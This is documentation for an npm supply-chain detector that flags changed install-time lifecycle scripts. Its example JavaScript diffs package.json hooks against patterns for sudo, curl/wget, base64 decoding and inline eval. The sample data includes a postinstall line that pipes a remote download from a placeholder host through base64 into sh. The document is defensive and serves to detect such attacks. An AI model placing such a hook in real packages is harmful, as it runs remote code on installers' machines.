NPM Suspicious Scripts
ID       | suspicious_scripts_npm
Severity | low
Family   | Suspicious Scripts
Description
Package managers have hooks (scripts) for lifecycle events.
npm uses up to 7 different hooks during package install, and these scripts can run not only JavaScript files but arbitrary OS commands as well. Things like sudo commands, or even install / preinstall scripts, are not recommended, but attackers use them anyway.
This detector finds changes in the scripts section between the current version and the previous version, so that they can be reviewed.
Security
If the scripts section changed between the current and the previous version, that may be a hint that malicious code is run by the installation process.
Mitigation / Fix
Check the change between versions: if the code is unintended, remove this dependency immediately. On the other hand, if it is benign code needed for installation, add a mute for this issue.
Please note that malicious agents take effort to hide malware from code reviews, using obfuscation techniques that should quickly raise alarms. Decryption, downloads from remote sites, usage of unintended binary files and the like are some of these techniques.
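As an added illustration of what this detector compares and what a reviewer looks for (example code, not the detector's own implementation), the script below diffs the install-time lifecycle hooks of two package.json versions and tags the changed scripts with review indicators. The hook names are npm's documented install hooks; the indicator patterns and the two sample package.json objects are this example's own assumptions.

```javascript
// npm hooks that run during "npm install" (7 of them), in execution order.
const INSTALL_HOOKS = [
  'preinstall', 'install', 'postinstall',
  'prepublish', 'preprepare', 'prepare', 'postprepare',
];

// Review heuristics (assumptions of this example, not the detector's rules):
// patterns that match the obfuscation techniques named above.
const INDICATORS = [
  ['sudo', /\bsudo\b/],
  ['remote download', /\b(curl|wget)\b/],
  ['base64 decode', /base64\s+(-d|--decode)/],
  ['inline code eval', /\bnode\s+-e\b/],
];

// Compare the scripts section of two package.json objects and return one finding
// per install hook that was added, removed or modified, with matching indicators.
function diffScripts(prevPkg, currPkg) {
  const prev = prevPkg.scripts || {};
  const curr = currPkg.scripts || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    if ((prev[hook] || '') === (curr[hook] || '')) continue; // unchanged hook
    const script = curr[hook] || '';
    findings.push({
      hook,
      change: !prev[hook] ? 'added' : !curr[hook] ? 'removed' : 'modified',
      previous: prev[hook] || null,
      current: curr[hook] || null,
      indicators: INDICATORS.filter(([, re]) => re.test(script)).map(([name]) => name),
    });
  }
  return findings;
}

// Constructed sample data: the previous version only builds; the new version
// adds a postinstall hook that downloads and decodes a remote payload.
const previous = { name: 'demo-lib', version: '1.0.0',
  scripts: { build: 'tsc', prepare: 'npm run build' } };
const current = { name: 'demo-lib', version: '1.0.1',
  scripts: { build: 'tsc', prepare: 'npm run build',
    postinstall: 'curl -s https://example.invalid/setup | base64 -d | sh' } };

const report = diffScripts(previous, current);
console.log(JSON.stringify(report, null, 2));
```

Only the changed hook is reported, so a "prepare" script that is identical in both versions produces no finding.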